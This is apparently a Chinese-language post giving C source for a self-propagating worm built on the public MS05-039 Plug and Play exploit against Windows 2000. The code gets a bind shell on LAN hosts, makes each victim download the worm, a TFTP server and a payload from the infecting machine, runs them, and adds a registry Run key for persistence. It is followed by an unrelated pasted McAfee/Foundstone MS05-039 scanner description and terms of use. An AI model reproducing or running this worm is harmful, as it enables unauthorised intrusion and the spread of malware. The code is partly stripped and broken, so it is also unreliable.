
今年8月的新蠕虫狙击波利用了ms05039 PnP服务漏洞, 因为ms05039的exploit在网上是公开的,请见, 可以利用这个exploit得到对方主机(win2k)的shell, 所以用这个exploit做一个蠕虫并不难。


实现的思路是,先在本机建立一个tftp服务器,然后得到局域网各个机器的ip地址,(不想惹麻烦,没有加上生成随机地址的代码,所以不会在公网上传播),然后逐个溢出,得到shell,再发送命宁,让对方主机用TFTP从本机下载3个文件,一个蠕虫文件,一个tftp服务端,一个payload文件。(思路来自Malware-fighting malicious code一书,作者比喻这种方式是搬家式的蠕虫,因为除了蠕虫自己以外,还需要把环境复制到对方主机中)。然后再发送命宁让对方主机执行蠕虫文件。执行时,先产生一个互斥量,确保只有一个蠕虫进程在机器上运行,然后写入注册表,实现下次开机自启动,再后面的过程就和开头一样了,如此反复循环。

以下是代码,winxp+vc6.0下编译通过, 注意目标主机只对win2k有效
声明:代码中精华部分是.::[ houseofdabus ]::.的exploit。
//以下shell code是.::[ houseofdabus ]::.的ms05039溢出exploit
//用于buffer overflow,是蠕虫的精华部分

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>

char SMB_Negotiate[] =

char SMB_SessionSetupAndX[] =

char SMB_SessionSetupAndX2[] =

char SMB_TreeConnectAndX[] =

char SMB_TreeConnectAndX_[] =

/* browser */
  char SMB_PipeRequest_browser[] =

  char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */

  char RPC_call[] =

/* jmp over - entry point */

/* pop reg; pop reg; retn; - umpnpmgr.dll */
"/x67/x15/x7a/x76" /* 0x767a1567 */

/* jmp ebx - umpnpmgr.dll
"/x6f/x36/x7a/x76" */


  char RPC_call_end[] =

  char bind_shellcode[] =

#define SET_PORTBIND_PORT(buf, port) /
*(unsigned short *)(((buf)+186)) = (port)

// worm.cpp : Defines the entry point for the application.

#include "stdafx.h"
#include "stdafx.h"
#include "shellcode.h"
#include <windows.h>
#include <stdio.h>
#include <shellapi.h>

void convert_name(char *out, char *name)
     unsigned long len;

     len = strlen(name);
     out += len * 2 - 1;
     while (len--) {
           *out-- = '/x00';
           *out-- = name[len];
//GetShell是.::[ houseofdabus ]::.写的ms05039溢出exploit
int GetShell(char* IP_address)

     struct sockaddr_in addr;
     struct hostent *he;
     int len;
     int sockfd;
     unsigned short smblen;
     unsigned short bindport;
      char tmp[1024];
      char packet[4096];
      char *ptr;
     char recvbuf[4096];
     #ifdef _WIN32
     WSADATA wsa;
     WSAStartup(MAKEWORD(2,0), &wsa);

     if ((he = gethostbyname(IP_address)) == NULL) {
     return 1;

     if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
      return 1;

     addr.sin_family = AF_INET;
     addr.sin_port = htons(445);
     addr.sin_addr = *((struct in_addr *)he->h_addr);
     memset(&(addr.sin_zero), '/0', 8);

     if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
      return 1;

     if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
      return 1;

     len = recv(sockfd, recvbuf, 4096, 0);
     if ((len <= 10) || (recvbuf[9] != 0)) {
      return 1;

     if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
      return 1;

     len = recv(sockfd, recvbuf, 4096, 0);
     if (len <= 10) {
      return 1;

     if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
      return 1;

     len = recv(sockfd, recvbuf, 4096, 0);
     if ((len <= 10) || (recvbuf[9] != 0)) {
      return 1;

     ptr = packet;
     memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
     ptr += sizeof(SMB_TreeConnectAndX)-1;

     sprintf(tmp, "%s//IPC$", IP_address);
     convert_name(ptr, tmp);
     smblen = strlen(tmp)*2;
     ptr += smblen;
     smblen += 9;
     memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

     memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
     ptr += sizeof(SMB_TreeConnectAndX_)-1;

     smblen = ptr-packet;
     smblen -= 4;
     memcpy(packet+3, &smblen, 1);

     if (send(sockfd, packet, ptr-packet, 0) < 0) {
      return 1;

     len = recv(sockfd, recvbuf, 4096, 0);
     if ((len <= 10) || (recvbuf[9] != 0)) {
      return 1;


     if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
      return 1;

     len = recv(sockfd, recvbuf, 4096, 0);
     if ((len <= 10) || (recvbuf[9] != 0)) {
      return 1;

     if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
      return 1;

     len = recv(sockfd, recvbuf, 4096, 0);
     if ((len <= 10) || (recvbuf[9] != 0)) {
      return 1;


     // nop
     ptr = packet;
     memset(packet, '/x90', sizeof(packet));

     // header & offsets
     memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
     ptr += sizeof(RPC_call)-1;

     // shellcode
     bindport = 7777;
     bindport ^= 0x0437;
     SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
     memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

     // end of packet
     memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,

     // sending...
     if (send(sockfd, packet, 2196, 0) < 0) {
      return 1;

     return 0;


//繁殖复制 by nick chang

int propagate(char *IP_address)
     struct sockaddr_in addr;
     struct hostent *he;

     int sockfd;
     char recvbuf[4096];

     #ifdef _WIN32
     WSADATA wsa;
     WSAStartup(MAKEWORD(2,0), &wsa);

     char szHostname[256]; 
     char *pszAddr;
     struct hostent *pHost;
           pszAddr=inet_ntoa(*(struct in_addr *) pHost->h_addr_list[0]);
     //worm 就是这个蠕虫文件本身了
     char sendserver[40];
     char sendworm[40];
     char sendpayload[40];
     sprintf(sendserver,"tftp -i %s GET tftpd32.exe/n",pszAddr);
     sprintf(sendworm,"tftp -i %s GET worm.exe/n",pszAddr);
     sprintf(sendpayload,"tftp -i %s GET payload.exe/n",pszAddr);

     if ((he = gethostbyname(IP_address)) == NULL) {
     return 1;

     if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
     return 1;

     addr.sin_family = AF_INET;
     addr.sin_port = htons(7777);
     addr.sin_addr = *((struct in_addr *)he->h_addr);
     memset(&(addr.sin_zero), '/0', 8);

     if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
     return 1;


     recv(sockfd, recvbuf, 4096, 0);

     if (send(sockfd, sendserver, strlen(sendserver), 0) < 0) {
     return 1;
     if (send(sockfd, sendworm, strlen(sendworm), 0) < 0) {
     return 1;
     if (send(sockfd, sendpayload, strlen(sendpayload), 0) < 0) {
     return 1;
     if (send(sockfd, "start ee.exe/n", strlen("start worm.exe/n"), 0) < 0) {
     return 1;

     if (send(sockfd, "ee.exe/n", strlen("worm.exe/n"), 0) < 0) {
     return 1;


     return 0;


//蠕虫线程,得到shell和复制by nick chang
     int ret;
     char *IP_address = (char *)p;

           if((ret=GetShell(IP_address))== 0)

     return 0;

//假设mask by nick chang
void gethost(char* pszAddr)
     int i=0;
     int j=0;
           if(pszAddr[j] == '.')
     pszAddr[j] = '/0';

//主程序by nick chang
int APIENTRY WinMain(HINSTANCE hInstance,
              HINSTANCE hPrevInstance,
              LPSTR   lpCmdLine,
              int     nCmdShow)
     char szHostname[256]; 
     char *pszAddr; 
     struct hostent *pHost;
     WORD wVersionRequested;
     WSADATA wsaData;
     int err;
     wVersionRequested = MAKEWORD( 2, 2 );
     err = WSAStartup( wVersionRequested, &wsaData );
     HANDLE m_hMutex = CreateMutex(NULL, NULL, "wormmutex");

           return 1;      
     //执行 payload
     for(int i =0; i<20;i++)
     ShellExecute(NULL,"open","payload.exe","","", SW_SHOW );
     ShellExecute(NULL,"open","tftpd32.exe","","", SW_HIDE );
     DWORD dwThreadID;
     HKEY hKey;
     char path[] = "c://winnt//system32//worm.exe";
     char data_Set[] = "Software//Microsoft//Windows//CurrentVersion//Run";
     int      len = strlen(path);
           pszAddr=inet_ntoa(*(struct in_addr *) pHost->h_addr_list[0]);            

           for(int i=1 ; i<255; i++)
     return 0;
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MS05-039 Scan v1.0,这是一款基于Windows 下快速检测和分析的安全扫描工具,可以正确识别那些容易遭受MS05-039 安全公告下溢出的Microsoft 操作系统。<br><br>相关漏洞链接:<br><br>------------------------------------------------------------------------------<br>MS05-039 Scan 1.0<br>Copyright 2005 (c) by McAfee, Inc.<br><br>------------------------------------------------------------------------------<br>?MS05-039 Scan v1.0<br><br>Microsoft UPnP MS05-039 Vulnerability Detection Utility<br>Copyright 2005?by Foundstone, Inc.<br><br><br>MS05-039 Scan 1.0 is a Windows based detection and analysis utility that can <br>quickly and accurately identify Microsoft operating systems that are <br>vulnerable to the multiple buffer overflow vulnerabilities released in the <br>MS05-039 bulletin. <br><br>MS05-039 Scan is intended for use by enterprise system and network administrators<br>as a fast and reliable utility for identifying at risk Microsoft systems in a <br>passive manner. This tool is non-abrasive in nature and may be run in production<br>environments during production hours. <br><br>Limitations of the tool:<br>The scanner is limited to 10 outgoing connections on WIndows XP SP2. This scanning limitation is caused by SP2. All other platforms will have 64 concurrent scanning threads running.<br><br>If you have anti-virus running it *may* detect this tool as an exploit. This tool *does NOT* exploit the vulnerabilty it simply determines if the machine is vulnerable or not.<br><br>Vulnerability Information:<br>There is a remotely exploitable vulnerability in the Plug and Play (PnP) RPC interface in Microsoft Windows.<br><br>Using a null session, an attacker could make an RPC request to the PnP interface on a Microsoft Windows system that could potentially execute arbitrary code.<br><br>This Foundstone check detects the absence of the patch by attempting to trigger the vulnerability in a nonintrusive manner over RPC.<br><br>Affected systems:<br><br>Microsoft Windows Server 2003 (All Versions)<br>Microsoft Windows XP (All Versions)<br>Microsoft Windows 2000 (All Versions)<br><br>For more information see:<br><br><br><br>==============================================================================<br><br><br>FOUNDSTONE, INC.<br><br>Terms of Use<br><br>1. Acceptance of Terms<br><br>1.1.<br>Read these Foundstone, Inc. ("Foundstone") Terms of Use ("Terms") carefully<br>before you ("You") accept these Terms by: (a) selecting the "Accept" button at<br>the end of the Terms, or (b) downloading any of the Foundstone tools ("Tools")<br>located on this web site. If You do not agree to all of these Terms, select<br>the "Decline" button at the end of the Terms, or do not download any of the<br>Tools.<br><br>1.2.<br>The Terms are entered into by and between Foundstone and You. Foundstone<br>provides the Tools to You strictly subject to the Terms.<br><br>2. Permitted Use<br><br>2.1.<br>The Tools are freeware that You may download them for Your personal,<br>non-commercial use only.<br><br>2.2.<br>You may not modify, reverse engineer, make derivative works of, distribute,<br>transmit or sell any of the Tools without the express written consent of<br>Foundstone. <br><br>2.3.<br>The Tools may not be used by You or any other party for any purpose that<br>violates any local, state, federal or foreign law. You understand that<br>breaking into any network or computer system not owned by You may be illegal.<br><br>3. No Express or Implied Warranty<br><br>3.1.<br>THE TOOLS ARE PROVIDED TO YOU "AS IS." FOUNDSTONE MAKES NO WARRANTIES OR<br>REPRESENTATIONS, EXPRESS OR IMPLIED, ABOUT THE EFFECTIVENESS, COMPLETENESS OR<br>FITNESS OF THE TOOLS, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF<br>MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.<br><br>4. Limitation of Liability<br><br>4.1.<br>YOU AGREE THAT FOUNDSTONE WILL NOT BE LIABLE FOR ANY DIRECT, INDIRECT,<br>INCIDENTAL, CONSEQUENTIAL OR PUNITIVE DAMAGES ARISING OUT OF YOUR USE OF, OR<br>INABILITY TO USE, THE TOOLS, INCLUDING WITHOUT LIMITATION ANY DAMAGE TO, OR<br>VIRUSES OR "TROJAN HORSES" THAT MAY INFECT OR INVADE, YOUR COMPUTER EQUIPMENT<br>OR OTHER PROPERTY, EVEN IF FOUNDSTONE IS EXPRESSLY ADVISED OF THE POSSIBILITY<br>OF SUCH DAMAGE.<br><br>4.2.<br>YOU AGREE TO HOLD FOUNDSTONE HARMLESS FROM, AND YOU COVENANT NOT TO SUE<br>FOUNDSTONE FOR, ANY CLAIMS BASED OR YOUR USE OF, OR YOUR INABILITY TO USE, THE<br>TOOLS.<br><br>5. Indemnification<br><br>5.1.<br>You agree to indemnify and hold Foundstone and its subsidiaries, affiliates,<br>officers, agents, and employees harmless from any claim or demand, including<br>attorney's fees, made by any third party due to or arising out of Your use of<br>the Tools, breach of the Terms, or violation of the rights of another.<br><br>6. Intellectual Property Rights<br><br>6.1.<br>The Tools and all names, marks, brands, logos, designs, trade dress and other<br>designations Foundstone uses in connection with the Tools are proprietary to<br>Foundstone and are protected by applicable intellectual property laws,<br>including, but not limited to copyrights and trademarks. Accordingly, You may<br>not modify, reverse engineer, make derivative works of, distribute, transmit<br>or sell any of the Tools, nor may You remove or alter any of Foundstone's<br>trademarks from the Tools or co-brand any of the Tools, without the express<br>written consent of Foundstone.<br><br>7. Miscellaneous<br><br>7.1.<br>California law and controlling United States federal law govern any action<br>related to the Terms. No choice of law rules of any jurisdiction apply. You<br>and Foundstone agree to submit to the personal and exclusive jurisdiction of<br>the California state court located in Santa Ana, California and the United<br>States District Court for the Central District of California.<br><br>7.2.<br>The Terms constitute the entire agreement between You and Foundstone and<br>govern Your use of the Tools, superseding any prior agreements between You and<br>Foundstone (including, but not limited to, prior versions of the Terms).<br><br>7.3.<br>Foundstone controls and operates this website from various locations in the<br>United States of America and makes no representation that these Tools are<br>appropriate or available for use in other locations. If you use this website<br>from locations outside the United States of America, You are responsible for<br>compliance with applicable local laws, including, but not limited to, the<br>export and import regulations of other countries.<br><br>7.4.<br>These Terms and this website could include inaccuracies or typographical<br>errors. Foundstone may make improvements and/or changes to the Terms or the<br>website at any time without notice.<br><br>7.5.<br>The failure of Foundstone to enforce or exercise any right or provision of the<br>Terms does not constitute a waiver of such right or provision.<br><br>7.6.<br>In the event any provision of this Agreement is held to be unenforceable in<br>any respect, such unenforceability shall not affect any other provision of<br>this Agreement, provided that the expected economic benefits of this Agreement<br>are not denied to either party.<br>


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